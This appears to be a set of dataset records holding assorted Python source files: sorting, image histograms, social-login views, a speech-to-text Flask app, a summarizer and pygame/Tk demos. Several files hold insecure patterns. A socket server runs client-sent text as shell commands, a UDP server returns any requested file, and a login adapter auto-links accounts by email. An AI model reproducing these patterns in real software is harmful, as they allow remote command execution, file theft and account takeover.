mid + 1, right)\n merge(arr, left, mid+1, right)\n\n merge_sort_helper(arr, 0, len(arr)-1)\n return arr\n\nif __name__ == '__main__':\n arr = [4, 2, 5, 6, 3, 1]\n temp = arr[:]\n print(merge_sort(arr, temp, 0, len(arr)-1))\n\n arr = [1, 2, 3, 4, 5, 6]\n temp = arr[:]\n print(merge_sort(arr, temp, 0, len(arr)-1))\n","sub_path":"lib/mergesort.py","file_name":"mergesort.py","file_ext":"py","file_size_in_byte":1374,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"180881420","text":"#/usr/bin/env python\r\n# -*- coding:utf-8 -*-\r\nimport os\r\nimport user\r\nimport socketserver\r\nfrom socket import socket,AF_INET,SOCK_STREAM\r\nimport ssl,subprocess\r\nKEYFILE = 'server_key.pem' #私有key\r\nCERTFILE ='server_cert.pem' #公有key,传给客户端的\r\n\r\n'''\r\ndef echo_client(s):\r\n while True:\r\n aa = s.recv(1024)\r\n if aa == b'':\r\n break\r\n print(str(aa,\"utf8\"))\r\n s.send(aa)\r\n s.close()\r\n print(\"连接关闭\")\r\n'''\r\nclass Myserver(socketserver.BaseRequestHandler):\r\n def handle(self):\r\n print(\"sss\")\r\n conn = self.request\r\n print(\"starting..\",self.client_address)\r\n\r\n '''\r\n s_ssl = ssl.wrap_socket(s,\r\n keyfile=KEYFILE,\r\n certfile=CERTFILE,\r\n server_side=True,\r\n )\r\n '''\r\n '''\r\n while True:\r\n c,a = s_ssl.accept()\r\n print(\"conn to:\",a)\r\n #echo_client(c)\r\n while True:\r\n aa = c.recv(1024)\r\n if aa == b'':\r\n break\r\n print(str(aa,\"utf8\"))\r\n c.send(aa)\r\n c.close()\r\n print(\"连接关闭\")\r\n '''\r\n Flag = True\r\n while Flag:\r\n data1 = conn.recv(1024)\r\n if not data1:\r\n break\r\n print(\"recv cmd:\",str(data1,'utf8'))\r\n cmd = str(data1,\"utf8\").strip()\r\n cmd_call = subprocess.Popen(cmd,shell=True, stdout=subprocess.PIPE)\r\n cmd_result = cmd_call.stdout.read()\r\n if len(cmd_result) == 0:\r\n cmd_result = b\"cmd execution has no output..\"\r\n\r\n ack_msg = bytes(\"CMD_RESULT_SIZE|%s\" %len(cmd_result) ,\"utf8\")\r\n\r\n conn.send(ack_msg)\r\n client_ack = conn.recv(50)\r\n if client_ack.decode() == 'CLIENT_READY_TO_RECV':\r\n conn.send(cmd_result )\r\n\r\nif __name__ == \"__main__\":\r\n server = socketserver.ThreadingTCPServer((\"127.0.0.1\",1234),Myserver)\r\n server.serve_forever()\r\n\r\n\r\n\r\n\r\n","sub_path":"day7/zuoye/back/ssl_server_duoxiancheng.py","file_name":"ssl_server_duoxiancheng.py","file_ext":"py","file_size_in_byte":2136,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"92051363","text":"# Authors: CS-World Domination Summer19 - DM\r\nimport cv2 as cv\r\nimport numpy as np\r\nfrom matplotlib import pyplot as plt\r\nimport os\r\nimport os.path\r\nimport shutil\r\nimport csv\r\nfrom prettytable import PrettyTable\r\n# NOTE: prettytable is only used to print the data so that it is more readable. It is otherwise unnecessary.\r\n# If you don't want to pip install prettytable then just comment out the respecitve code, it should all be in writeCSV()\r\n\r\ndef histCompare(baseFile, folderName, path):\r\n os.chdir(path)\r\n AllFiles = list(os.walk(path))[0][2]\r\n data = []\r\n # Take out the files we don't want to parse\r\n if '.DS_Store' in AllFiles:\r\n # NOTE: DS_Store files are an annoying Mac feature, if you aren't using MacOS you can delete this if statement\r\n ind = AllFiles.index('.DS_Store')\r\n AllFiles = AllFiles[:ind] + AllFiles[ind+1:]\r\n if baseFile in AllFiles:\r\n ind = AllFiles.index(baseFile)\r\n AllFiles = AllFiles[:ind] + AllFiles[ind+1:]\r\n # Create the histogram for our base image\r\n imageBase = cv.imread(baseFile, 1) # -1 bgra, 0 gray, 1 bgr\r\n histBase = cv.calcHist([imageBase],[0,1,2],None,[256,256,256],[0, 256, 0, 256, 0, 256])\r\n cv.normalize(histBase, histBase, alpha=0, beta=1, norm_type=cv.NORM_MINMAX) # BUG CHECK!!!\r\n # NOTE: You could also use hsv to compare images:\r\n # imageBase = cv.cvtColor(imageBase, cv.COLOR_BGR2HSV) \r\n for file in AllFiles:\r\n # Create the histograms for our comparison images\r\n imageToComp = cv.imread(file, 1) # -1 bgra, 0 gray, 1 bgr\r\n histToComp = cv.calcHist([imageToComp],[0,1,2],None,[256,256,256],[0, 256, 0, 256, 0, 256])\r\n cv.normalize(histToComp, histToComp, alpha=0, beta=1, norm_type=cv.NORM_MINMAX) # BUG CHECK!!!\r\n # Calculate comparisons and store to data\r\n result0 = cv.compareHist(histBase,histToComp,cv.HISTCMP_CORREL)\r\n result1 = cv.compareHist(histBase,histToComp,cv.HISTCMP_CHISQR)\r\n result2 = cv.compareHist(histBase,histToComp,cv.HISTCMP_INTERSECT)\r\n result3 = cv.compareHist(histBase,histToComp,cv.HISTCMP_BHATTACHARYYA)\r\n result4 = cv.compareHist(histBase,histToComp,cv.HISTCMP_KL_DIV)\r\n data.append([file, str(round(result0,4)), str(round(result1,4)), str(round(result2,4)), str(round(result3,4)), str(round(result4,4))])\r\n return data\r\n\r\ndef writeCSV(path, data):\r\n \" Takes our data and writes it to a csv file\"\r\n path = os.path.join(path, \"HistogramData.csv\")\r\n with open(path, 'w') as myCSVfile:\r\n print(\"Writing HistogramData.csv\")\r\n filewriter = csv.writer(myCSVfile, delimiter='\\n', quoting=csv.QUOTE_NONE, escapechar='\\\\')\r\n filewriter.writerow([\"File_Name,Correlation,Chi-square,Intersection,BHATTACHARYYA,Kullback-Leibler\"])\r\n t = PrettyTable([\"File_Name\", \"Correlation\", \"Chi-square\", \"Intersection\", \"BHATTACHARYYA\", \"Kullback-Leibler\"])\r\n for i in range(0,len(data)):\r\n filewriter.writerow([data[i][0] + ',' + data[i][1] + ',' + data[i][2] + ',' + data[i][3] + ',' + data[i][4] + ',' + data[i][5]])\r\n t.add_row([data[i][0], data[i][1], data[i][2], data[i][3][0], data[i][4], data[i][5]])\r\n print(t)\r\n return\r\n\r\ndef main():\r\n original_dir = os.getcwd()\r\n folderName = \"960x640 Flowers\"\r\n compFile = \"f1.jpg\"\r\n path = os.path.join(original_dir, folderName)\r\n data = histCompare(compFile, folderName, path)\r\n os.chdir(original_dir)\r\n writeCSV(original_dir, data)\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n","sub_path":"OpenCV-Examples/Image Histograms/comparing-histograms.py","file_name":"comparing-histograms.py","file_ext":"py","file_size_in_byte":3546,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"227304885","text":"from allauth.socialaccount.providers.facebook.views import FacebookOAuth2Adapter\nfrom allauth.socialaccount.providers.twitter.views import TwitterOAuthAdapter\nfrom allauth.socialaccount.providers.google.views import GoogleOAuth2Adapter\nfrom allauth.socialaccount.providers.oauth2.client import OAuth2Client\nfrom allauth.account.models import EmailAddress\nfrom allauth.exceptions import ImmediateHttpResponse\nfrom allauth.socialaccount.adapter import DefaultSocialAccountAdapter\nfrom rest_auth.registration.views import SocialLoginView\nfrom rest_auth.social_serializers import TwitterLoginSerializer\nfrom rest_framework.response import Response\nfrom rest_auth.views import LoginView\nfrom django.conf import settings\nfrom user.models import User\n\n\nclass FacebookLogin(SocialLoginView):\n adapter_class = FacebookOAuth2Adapter\n client_class = OAuth2Client\n callback_url = settings.CURRENT_URL + '/oauth/'\n\n def post(self, request, *args, **kwargs):\n self.callback_url = self.request.data['redirect_uri']\n self.request = request\n self.serializer = self.get_serializer(data=self.request.data)\n self.serializer.is_valid(raise_exception=True)\n\n self.login()\n return self.get_response()\n\n\nclass GoogleLogin(SocialLoginView):\n adapter_class = GoogleOAuth2Adapter\n client_class = OAuth2Client\n callback_url = settings.CURRENT_URL + '/oauth/'\n\n def post(self, request, *args, **kwargs):\n self.callback_url = self.request.data['redirect_uri']\n self.request = request\n self.serializer = self.get_serializer(data=self.request.data)\n self.serializer.is_valid(raise_exception=True)\n\n self.login()\n return self.get_response()\n\n\nclass TwitterLogin(LoginView):\n serializer_class = TwitterLoginSerializer\n adapter_class = TwitterOAuthAdapter\n\n\nclass SocialAccountAdapter(DefaultSocialAccountAdapter):\n def pre_social_login(self, request, sociallogin):\n \"\"\"\n Invoked just after a user successfully authenticates via a\n social provider, but before the login is actually processed\n (and before the pre_social_login signal is emitted).\n\n We're trying to solve different use cases:\n - social account already exists, just go on\n - social account has no email or email is unknown, just go on\n - social account's email exists, link social account to existing user\n \"\"\"\n\n # Ignore existing social accounts, just do this stuff for new ones\n if sociallogin.is_existing:\n return\n\n # some social logins don't have an email address, e.g. facebook accounts\n # with mobile numbers only, but allauth takes care of this case so just\n # ignore it\n if 'email' not in sociallogin.account.extra_data:\n return\n\n # check if given email address already exists.\n # Note: __iexact is used to ignore cases\n try:\n email = sociallogin.account.extra_data['email'].lower()\n email_address = EmailAddress.objects.get(email__iexact=email)\n\n # if it does not, let allauth take care of this new social account\n except EmailAddress.DoesNotExist:\n return\n\n # if it does, connect this new social login to the existing user\n user = email_address.user\n sociallogin.connect(request, user)\n","sub_path":"user/auth.py","file_name":"auth.py","file_ext":"py","file_size_in_byte":3358,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"305015217","text":"import basetest\nimport requests\nimport json\n\n\nclass TestCaseBuildPackCustomHeaderConfig(basetest.BaseTest):\n def setUp(self):\n super().setUp()\n self.setUpCF(\n \"BuildpackTestApp-mx-7-16.mda\",\n env_vars={\n \"X_FRAME_OPTIONS\": \"DENY\",\n \"HTTP_RESPONSE_HEADERS\": json.dumps(\n {\n \"X-Permitted-Cross-Domain-Policies\": \"by-content-type\",\n \"Access-Control-Allow-Origin\": \"https://this.is.mydomain.nl\",\n \"X-XSS-Protection\": \"1; report=https://domainwithnewstyle.tld.consultancy\",\n \"X-Content-Type-Options\": \"nosniff\",\n }\n ),\n },\n )\n self.startApp()\n\n def _httpget(self):\n full_uri = \"https://\" + self.app_name\n response = requests.get(full_uri)\n return response\n\n def test_custom_header_settings(self):\n self.assert_app_running()\n response = self._httpget()\n self.assertIn(\"DENY\", response.headers[\"X-Frame-Options\"])\n self.assertIn(\n \"https://this.is.mydomain.nl\",\n response.headers[\"Access-Control-Allow-Origin\"],\n )\n self.assertIn(\"nosniff\", response.headers[\"X-Content-Type-Options\"])\n self.assertIn(\n \"by-content-type\",\n response.headers[\"X-Permitted-Cross-Domain-Policies\"],\n )\n self.assertIn(\n \"1; report=https://domainwithnewstyle.tld.consultancy\",\n response.headers[\"X-XSS-Protection\"],\n )\n","sub_path":"tests/usecase/test_buildpack_custom_headers.py","file_name":"test_buildpack_custom_headers.py","file_ext":"py","file_size_in_byte":1590,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"400249215","text":"from flask import Flask, render_template, url_for, send_file\nfrom flask_wtf.file import FileField, FileRequired, FileAllowed\nfrom flask_wtf import FlaskForm\nfrom wtforms import SelectField, SubmitField\nfrom werkzeug.utils import secure_filename\nfrom pydub import AudioSegment\n# create file ignored_file.py with SECRET_KEY\nfrom ignored_file import SECRET_KEY\nimport speech_recognition as sr\nimport os\nimport glob\nimport shutil\nimport subprocess\n\napp = Flask(__name__)\napp.config['SECRET_KEY'] = SECRET_KEY\n\nr = sr.Recognizer()\n\n\nclass UploadForm(FlaskForm):\n language = SelectField('Language', choices=['Russian: ru', 'English: en-US'])\n file = FileField(validators=[FileAllowed(['mp4'], 'MP4s only!'), FileRequired('File is empty!')])\n submit = SubmitField('Upload')\n\n\ndef get_large_audio(path, language, chunksize=60000):\n sound = AudioSegment.from_mp3(path)\n\n def divide_chunks(sound, chunksize):\n for i in range(0, len(sound), chunksize):\n yield sound[i:i + chunksize]\n\n chunks = list(divide_chunks(sound, chunksize))\n whole_text = ''\n folder_name = 'audio-chunks'\n if not os.path.isdir(folder_name):\n os.mkdir(folder_name)\n for index, chunk in enumerate(chunks):\n chunk.export(os.path.join(folder_name, f'chunk{index}.wav'), format='wav')\n with sr.AudioFile(os.path.join(folder_name, f'chunk{index}.wav')) as source:\n audio = r.record(source)\n try:\n text = r.recognize_google(audio, language=language)\n whole_text += f'{text} '\n except sr.UnknownValueError:\n print('The text could not be recognized')\n shutil.rmtree(os.path.abspath(folder_name))\n return whole_text\n\n\n@app.route('/', methods=['GET', 'POST'])\ndef home():\n files_txt = glob.glob('txt/*.txt')\n for file in files_txt:\n os.remove(file)\n files_mp4 = glob.glob('*.mp3')\n for file in files_mp4:\n os.remove(file)\n files_mp4 = glob.glob('*.mp4')\n for file in files_mp4:\n os.remove(file)\n form = UploadForm()\n if form.validate_on_submit():\n folder_txt = 'txt'\n if not os.path.isdir(folder_txt):\n os.mkdir(folder_txt)\n filename = secure_filename(form.file.data.filename)\n form.file.data.save(filename)\n name_file = filename.split('.')[0]\n command = f'ffmpeg -i {filename} -b:a 320k {name_file}.mp3'\n subprocess.call(command)\n text_to_file = get_large_audio(f'{name_file}.mp3', language=form.language.data.split(': ')[1])\n text = open(f'txt/{name_file}.txt', 'w+', encoding='utf-8')\n text.write(text_to_file)\n text.close()\n return send_file(f'txt/{name_file}.txt', mimetype='txt', attachment_filename=f'{name_file}.txt',\n as_attachment=True)\n return render_template('index.html', form=form)\n\n\nif __name__ == '__main__':\n app.run(debug=True)\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2901,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"101767820","text":"#!/usr/bin/env python\n\n'''\nCopyright (c) 2020 RIKEN\nAll Rights Reserved\nSee file LICENSE for details.\n'''\n\n\nimport log,traceback\n\nclass load:\n def __init__(self, args):\n log.logger.debug('started')\n try:\n # default\n self.genome_cov_thresholds=0.05 # Defining high coverage viruses relies greatly on this parameter\n self.ave_depth_of_mapped_region_threshold=3 # Defining high coverage viruses relies greatly on this parameter\n self.hisat2_mismatch_penalties='2,1'\n self.min_seq_len=20\n self.bedgraph_bin=1\n self.reconst_minimum_depth=1\n if args.ONT_bamin is True:\n self.reconst_minimum_depth=5\n if args.ONT_recon_min_depth is not None:\n if isinstance(args.ONT_recon_min_depth, int) is False:\n log.logger.error('No integer was specified with -ONT_recon_min_depth flag.')\n exit(1)\n self.reconst_minimum_depth= int(args.ONT_recon_min_depth)\n log.logger.info('%s was specified with -ONT_recon_min_depth flag. It will use %s.' % (args.ONT_recon_min_depth, args.ONT_recon_min_depth))\n self.ont_hhv6_ratio_threshold=2\n self.gzip_compresslevel=1\n self.metaspades_kmer='21,33,55'\n self.metaspades_memory=4\n self.quick_check_read_num=1000000\n \n params_for_debug=[]\n for k,v in self.__dict__.items():\n params_for_debug.append('%s=%s' % (k, str(v)))\n log.logger.debug('parameters:\\n'+ '\\n'.join(params_for_debug))\n except:\n log.logger.error('\\n'+ traceback.format_exc())\n exit(1)\n","sub_path":"scripts/load_parameters.py","file_name":"load_parameters.py","file_ext":"py","file_size_in_byte":1757,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"539985867","text":"import gensim\nimport re\nimport pathlib\nimport xml.etree.cElementTree as ET\nimport string\nfrom gensim.summarization.summarizer import summarize\nfrom gensim.summarization.textcleaner import split_sentences\nfrom gensim.summarization import keywords\ndef read_files(dir:pathlib.Path, recursive=False):\n\n for file in dir.glob(\"*.xml\"):\n print(str(file.absolute()))\n tree = ET.parse(file)\n body = tree.find(\"legis-body\")\n if body is None:\n body = tree.find(\"amendment-body\")\n if body is None:\n body = tree.find(\"resolution-body\")\n if body is None:\n body = tree.find(\"engrossed-amendment-body\")\n if body is None:\n print(file)\n exit(1)\n tBody = ET.ElementTree(body)\n child = ET.Element\n bodyText = \"\"\n # try:\n for child in tBody.iter(\"text\"):\n if child.text is not None:\n bodyText += child.text\n # except:\n # print(\"Something went wrong\", print(child))\n # print(file.name)\n # exit(1)\n cleanText = clean(bodyText)\n print(summarize(cleanText,ratio=0.05))\n print(keywords(cleanText, ratio = 0.1))\n\ndef clean(text:str): \n # # remove number chars\n # text = re.sub('\\d', '', text)\n # # remove certain special chars\n # text = text.replace('--', '').replace(' ','').replace('(', '').replace(')','').replace('$','')\n transTable = str.maketrans(',',',',string.punctuation + \"-()$\" + string.digits)\n transText = text.translate(transTable)\n\ncwd = pathlib.Path.cwd()\ndir_path = pathlib.Path(\"data/gov_docs/BILLS-116-1-hr/\")\nread_files(cwd/dir_path)\n# convert text from file to a string\n# with open(\"congress.txt\", \"r\") as myfile:\n# text = (str(myfile.readlines()))\n\n# # remove number chars\n# text = re.sub('\\d', '', text)\n# # remove certain special chars\n# text = text.replace('--', '').replace(' ','').replace('(', '').replace(')','').replace('$','')\n\n# # create text file\n# File_object = open(\"newFile.txt\",\"w\")\n\n# # write to text file\n# #File_object.writelines(summarize(text , .05))\n# print(summarize(text ,.05))\n","sub_path":"data/Gensim Summarization with text file to string/Summarizer.py","file_name":"Summarizer.py","file_ext":"py","file_size_in_byte":2158,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"239298295","text":"import cv2\r\nimport os\r\n\r\nclass EyesDetect:\r\n\r\n\tdef __init__(self):\r\n\t\tself.eyeCascade = cv2.CascadeClassifier('haarcascade_eye_tree_eyeglasses.xml')\r\n\r\n\tdef detect(self, image_path):\r\n\t\timg = cv2.imread(image_path)\r\n\t\tframe = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\r\n\t\teyes = self.eyeCascade.detectMultiScale(frame,\r\n\t\t\t\t\t\t\tscaleFactor=1.1,\r\n\t\t\t\t\t\t\tminNeighbors=5,\r\n\t\t\t\t\t\t\tminSize=(30, 30),\r\n\t\t\t\t\t\t\t)\r\n\t\tif len(eyes) == 0:\r\n\t\t\tos.remove(image_path)\r\n\t\t\treturn 'closed'\r\n\t\telse:\r\n\t\t\tos.remove(image_path)\r\n\t\t\treturn 'opened'\r\n","sub_path":"close_eye_detect.py","file_name":"close_eye_detect.py","file_ext":"py","file_size_in_byte":523,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"556189167","text":"from socket import *\nserverName = \"10.124.7.86\"\nserverPort = 1200\nserverSocket = socket(AF_INET,SOCK_DGRAM)\nserverSocket.bind((serverName,serverPort))\nprint(\"The Server is ready to receive...\")\nwhile 1:\n sentence, clientaddr= serverSocket.recvfrom(2048)\n file1 = open(sentence,\"r\")\n line = file1.read(2048)\n serverSocket.sendto(bytes(line,\"utf-8\"),clientaddr)\n print(\"Sent to Client...\")\n file1.close()\n","sub_path":"Socket-Programs/UDP/server_udp.py","file_name":"server_udp.py","file_ext":"py","file_size_in_byte":421,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"538603751","text":"import pygame\nimport numpy as np\nfrom utils.extramath import avg\nfrom utils.pygame_utils import scale_points\n\ndrawline = pygame.draw.line\n\nclass Grid(object):\n\n def __init__(self, window=((-10, 10), (-10, 10)), interval=1):\n x,y = pygame.display.get_surface().get_size()\n self.screen_center = [x/2, y/2]\n self.scale = (x/(window[0][1]-window[0][0]), y/(window[0][1]-window[0][0]))\n self.lower = window[1][0]\n self.left = window[0][0]\n self.upper = window[1][1]\n self.right = window[0][1]\n self.scaled_lower = 0\n self.scaled_left = 0\n self.scaled_upper = y\n self.scaled_right = x\n self.x_axis = avg(self.lower, self.upper)\n self.y_axis = avg(self.left, self.right)\n self.scaled_xax = self.x_axis * self.scale[1] + self.screen_center[1]\n self.scaled_yax = self.y_axis * self.scale[0] + self.screen_center[0]\n\n self.interval = interval\n\n self.x_locations = np.array([x for x in np.arange(self.y_axis, self.right + self.interval, self.interval)])\n self.y_locations = np.array([y for y in np.arange(self.x_axis, self.upper + self.interval, self.interval)])\n\n self.original_lattice = np.array([[[x, y] for x in np.arange(self.left, self.right + self.interval, self.interval)]\n for y in np.arange(self.lower, self.upper + self.interval, self.interval)])\n\n\n def draw_grid(self, screen, line_width=2, color=(0, 0, 0)):\n for x in scale_points(self.x_locations, self.scale[0], self.screen_center[0]):\n drawline(screen, color, (x, self.scaled_lower), (x, self.scaled_upper), line_width)\n for x in scale_points(-self.x_locations, self.scale[0], self.screen_center[0]):\n drawline(screen, color, (x, self.scaled_lower), (x, self.scaled_upper), line_width)\n for y in scale_points(self.y_locations, self.scale[1], self.screen_center[1]):\n drawline(screen, color, (self.scaled_left, y), (self.scaled_right, y), line_width)\n for y in scale_points(-self.y_locations, self.scale[1], self.screen_center[1]):\n drawline(screen, color, (self.scaled_left, y), (self.scaled_right, y), line_width)\n\n self.draw_axes(screen, color=color)\n\n def draw_axes(self, screen, line_width=4, color=(0, 0, 0)):\n drawline(screen, (0, 0, 255), (self.scaled_yax, self.scaled_lower), (self.scaled_yax, self.scaled_upper), line_width)\n drawline(screen, (0, 0, 255), (self.scaled_left * self.scale[0], self.scaled_xax), (self.scaled_right, self.scaled_xax), line_width)","sub_path":"utils/grid.py","file_name":"grid.py","file_ext":"py","file_size_in_byte":2588,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"482170795","text":"#!/usr/bin/env python\r\n# -*- coding: utf-8 -*-\r\n\r\nfrom PIL import Image, ImageDraw, ImageOps, ImageFont, ImageFilter, ImageChops, ImageColor, ImageTk, ImageDraw\r\nimport time, re, copy, os, codecs, random, datetime, json\r\nimport tkinter\r\nimport threading\r\n\r\nclass dotworker(object):\r\n monimagearray = []\r\n monanim = 0\r\n monarray = []\r\n moncountwait = 0\r\n bgimagearray = []\r\n bgimagepos = 0\r\n bgimagetype = 0\r\n bgimagenexttype = 0\r\n fontreg = 0\r\n fontbold = 0\r\n statusbg = 0\r\n\r\n def imagenew(self):\r\n imagecolorspace = 'RGB'\r\n imagecolorfill = (0, 0, 80)\r\n imagesizex = 64\r\n imagesizey = 128\r\n image = Image.new(imagecolorspace, (imagesizex, imagesizey), imagecolorfill)\r\n return (image)\r\n\r\n def bginit(self,basedir):\r\n for x in range(0,3):\r\n bgimagearraytemp = []\r\n for y in range(0,3):\r\n file = str(x) + \"_\" + str(y) + \".png\"\r\n image = Image.open(basedir + \"images/daihaikei/\" + file).convert(\"RGBA\")\r\n bgimagearraytemp.append(image)\r\n self.bgimagearray.append(bgimagearraytemp)\r\n\r\n def bgdraw(self,parm):\r\n baseimage = 0\r\n addimage = 1\r\n alpha = float( parm / 50 )\r\n if parm > 49:\r\n baseimage = 1\r\n addimage = 2\r\n alpha = float((parm - 50 ) / 50 )\r\n self.bgimagepos = self.bgimagepos + 1\r\n if self.bgimagepos > 255:\r\n self.bgimagetype = self.bgimagenexttype\r\n self.bgimagepos = 11\r\n if self.bgimagepos > 245:\r\n if self.bgimagenexttype == self.bgimagetype:\r\n rnd = int (random.uniform(0,2)) + 1\r\n if rnd == 3:\r\n rnd = 1\r\n self.bgimagenexttype = (self.bgimagetype + rnd) % 3\r\n bgimagep = Image.blend(self.bgimagearray[self.bgimagetype][baseimage],self.bgimagearray[self.bgimagetype][addimage],alpha)\r\n bgimagen = Image.blend(self.bgimagearray[self.bgimagenexttype][baseimage],self.bgimagearray[self.bgimagenexttype][addimage],alpha)\r\n bgimagen.paste(bgimagen,(245,0))\r\n alphan = 1 - ((255 - self.bgimagepos) / 10)\r\n if alphan < 0:\r\n alphan = 0\r\n bgimage = Image.blend(bgimagep,bgimagen,alphan)\r\n else:\r\n bgimage = Image.blend(self.bgimagearray[self.bgimagetype][baseimage],self.bgimagearray[self.bgimagetype][addimage],alpha)\r\n bgimageposend = self.bgimagepos + 64\r\n image = bgimage.crop((self.bgimagepos,131,bgimageposend,259))\r\n return (image)\r\n\r\n def moninit(self,basedir):\r\n files = os.listdir(basedir + \"images/picsqMobchip/4houkou/\")\r\n for file in files:\r\n if not 'png' in file:\r\n continue\r\n image = Image.open(basedir + \"images/picsqMobchip/4houkou/\" + file).convert(\"RGBA\")\r\n for x in range(image.size[0]):\r\n for y in range(image.size[1]):\r\n pixel = image.getpixel( (x, y) )\r\n if pixel[0] == 255 and pixel[1] == 255 and pixel[2] == 255:\r\n image.putpixel( (x, y), (255,255,255,0) )\r\n monimagearraytempy = []\r\n for y in range(0,4):\r\n monimagearraytempx = []\r\n for x in range(0,3):\r\n cropylow = y * 32\r\n cropyhigh = cropylow + 32\r\n cropxlow = x * 32\r\n cropxhigh = cropxlow + 32\r\n monimagearraytempx.append(image.crop((cropxlow,cropylow,cropxhigh,cropyhigh)))\r\n monimagearraytempy.append(monimagearraytempx)\r\n self.monimagearray.append(monimagearraytempy)\r\n\r\n def mondraw(self,image,parm,parm2):\r\n self.monanim = self.monanim + 1\r\n if self.monanim > 11:\r\n self.monanim = 0\r\n monanimpointer = int(self.monanim / 4)\r\n moncounttarget = int(parm / 10)\r\n monspeedtarget = int(parm2 / 20)\r\n if monspeedtarget < 1:\r\n monspeedtarget = 1\r\n if len(self.monarray) < moncounttarget:\r\n self.moncountwait = self.moncountwait + 1\r\n moncountrsv = moncounttarget - len(self.monarray)\r\n moncountscale = 64 / moncounttarget\r\n moncountper = ( moncountrsv / 64) * 100\r\n if self.moncountwait > moncountscale:\r\n moncountper = moncountper * self.moncountwait\r\n else:\r\n moncountper = moncountper / 5\r\n if random.uniform(0,100) < moncountper:\r\n self.moncountwait = 0\r\n montype = int(random.uniform(0,len(self.monimagearray)))\r\n if montype == len(self.monimagearray):\r\n montype = 0\r\n mony = int(random.uniform(0,30))\r\n self.monarray.append([montype,monspeedtarget,1000,mony])\r\n newmonarray = []\r\n for moni in range(0,len(self.monarray)):\r\n if self.monarray[moni][2] == 1000:\r\n self.monarray[moni][2] = -32\r\n else:\r\n self.monarray[moni][2] = self.monarray[moni][2] + self.monarray[moni][1]\r\n if self.monarray[moni][2] > 63:\r\n continue\r\n newmonarray.append(self.monarray[moni])\r\n monp = self.monarray[moni][0]\r\n monx = self.monarray[moni][2]\r\n mony = self.monarray[moni][3] + 65\r\n monimage = Image.new(\"RGBA\",(64,128),(255,255,255,0))\r\n monimage.paste(self.monimagearray[monp][2][monanimpointer],(monx,mony))\r\n image = Image.alpha_composite(image,monimage)\r\n self.monarray = newmonarray\r\n return (image)\r\n\r\n def statusinit(self,basedir):\r\n fontdata = basedir + \"PixelMplus10-Regular.ttf\"\r\n self.fontreg = ImageFont.truetype(fontdata, 10)\r\n fontdata = basedir + \"PixelMplus10-Bold.ttf\"\r\n self.fontbold = ImageFont.truetype(fontdata, 10)\r\n self.statusbg = Image.new(\"RGBA\",(64,128),(0,0,0,0))\r\n statusspace = Image.new(\"RGBA\",(64,48),(0,0,0,0))\r\n draw = ImageDraw.Draw(statusspace)\r\n draw.rectangle((2,2,62,46),fill=(0,0,0,32))\r\n draw.text((3,3), \"CPU\", (255, 255, 255,128),font=self.fontbold)\r\n draw.text((3,25), \"GPU\", (255, 255, 255,128),font=self.fontbold)\r\n self.statusbg.paste(statusspace,(0,0))\r\n\r\n def statusdraw(self,image,cpufreq,cpuload,cputemp,gpuload,gputemp):\r\n cpufreq = int(cpufreq)\r\n cpufreq = str(cpufreq).rjust(4)\r\n cpuload = int(cpuload)\r\n cpuload = str(cpuload).rjust(3)\r\n cputemp = int(cputemp)\r\n cputemp = str(cputemp).rjust(2)\r\n gpuload = int(gpuload)\r\n gpuload = str(gpuload).rjust(3)\r\n gputemp = int(gputemp)\r\n gputemp = str(gputemp).rjust(2)\r\n statusimage = copy.copy(self.statusbg)\r\n draw = ImageDraw.Draw(statusimage)\r\n draw.text((25,4), cpufreq + \" MHz\", (0, 0, 0, 128),font=self.fontreg)\r\n draw.text((4,14), cpuload + \" % \" + cputemp +\" C\", (0, 0, 0, 128),font=self.fontreg)\r\n draw.text((4,36), gpuload + \" % \" + gputemp +\" C\", (0, 0, 0, 128),font=self.fontreg)\r\n draw.text((24,3), cpufreq + \" MHz\", (255, 255, 255,128),font=self.fontreg)\r\n draw.text((3,13), cpuload + \" % \" + cputemp +\" C\", (255, 255, 255,128),font=self.fontreg)\r\n draw.text((3,35), gpuload + \" % \" + gputemp +\" C\", (255, 255, 255,128),font=self.fontreg)\r\n\r\n image = Image.alpha_composite(image,statusimage)\r\n return (image)\r\n\r\ndef guiinit():\r\n global item, canvas, img\r\n root = tkinter.Tk()\r\n root.title('test')\r\n root.geometry(\"64x128\")\r\n img = Image.new(\"RGB\", (64, 128), (0,0,0))\r\n img = ImageTk.PhotoImage(img)\r\n canvas = tkinter.Canvas(bg = \"black\", width=64, height=128)\r\n canvas.place(x=0, y=0)\r\n item = canvas.create_image(0, 0, image=img, anchor=tkinter.NW)\r\n root.mainloop()\r\n\r\ndef main():\r\n basedir = \"./\"\r\n thread1 = threading.Thread(target=guiinit)\r\n thread1.setDaemon(True)\r\n thread1.start()\r\n time.sleep(1)\r\n\r\n dot = dotworker()\r\n image = dot.imagenew()\r\n dot.bginit(basedir)\r\n dot.moninit(basedir)\r\n dot.statusinit(basedir)\r\n\r\n while True:\r\n bgimage = dot.bgdraw(60)\r\n image = dot.mondraw(bgimage,60,60)\r\n image = dot.statusdraw(image,\"5000\",\"60\",\"20\",\"30\",\"40\")\r\n\r\n imageoutput = ImageTk.PhotoImage(image)\r\n canvas.itemconfig(item,image=imageoutput,anchor=tkinter.NW)\r\n time.sleep(0.05)\r\n\r\nif __name__ == '__main__':\r\n 